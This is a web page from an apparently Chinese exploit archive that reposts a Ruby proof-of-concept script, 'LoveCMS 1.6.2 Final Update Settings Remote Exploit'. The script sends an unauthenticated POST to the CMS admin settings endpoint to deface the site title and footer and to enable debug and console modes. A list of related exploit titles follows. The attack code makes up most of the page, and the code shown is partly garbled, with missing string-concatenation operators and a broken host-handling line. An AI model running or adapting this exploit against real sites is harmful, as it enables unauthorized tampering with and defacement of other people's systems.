手机
当前位置:查字典教程网 >网络安全 >Exploit >LoveCMS 1.6.2 Final Update Settings Remote Exploit
LoveCMS 1.6.2 Final Update Settings Remote Exploit
摘要:#!/usr/bin/ruby###ExploitbyPoMdaPiMp!##---------------------##pomdapim...

#!/usr/bin/ruby

#

## Exploit by PoMdaPiMp!

## ---------------------

## pomdapimp(at)gmail(dotcom)

##

## LoveCMS Exploit Series

## Episode 3: changing site settings ...

##

## Description: Simply change the site settings !

##

## Usage: ./LoveCMS_3_settings.rb <host>

## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/

##

## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)

#

require 'net/http'

require 'uri'

@host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/'

@post_vars = {}

@post_vars['submit'] = 1

@post_vars['pagetitle'] = 'P4g3T1t1le'

@post_vars['sitename'] = 'SiteN4me'

@post_vars['slogan'] = 'By PoMdaPiMp.'

@post_vars['footer'] = 'PoMdaPiMp was here.'

@post_vars['description'] = 'Ruby is a gift.'

@post_vars['keywords'] = 'PoMdaPiMp, hack'

@post_vars['encoding'] = 'utf-8'

@post_vars['tips'] = 'off'

@post_vars['console'] = 'on'

@post_vars['debugmode'] = 'on'

@post_vars['module'] = 2

@post_vars['love_root'] = ''

@post_vars['love_url'] = ''

@host = ARGV[0] if ARGV[0]

@host = @host[-1, 1].to_s != '/' ? '/' : ''

if @host

# --

puts " LoveCMS Exploit Series. #3: Messing with settings."

puts

puts " : Attacking host: " @host

# --

# Changing settings

res = Net::HTTP.post_form(URI.parse(@host 'system/admin/themes.php'),

@post_vars)

puts " :: Values set."

@post_vars.each do |k, v|

puts " " k.to_s " > " v.to_s

end

# --

puts

puts " - Visit " @host

end

【LoveCMS 1.6.2 Final Update Settings Remote Exploit】相关文章:

MS Internet Explorer (FTP Server Response) DoS Exploit

The Personal FTP Server 6.0f RETR Denial of Service Exploit

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

webEdition CMS (we_objectID) Blind SQL Injection Exploit

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

精品推荐
分类导航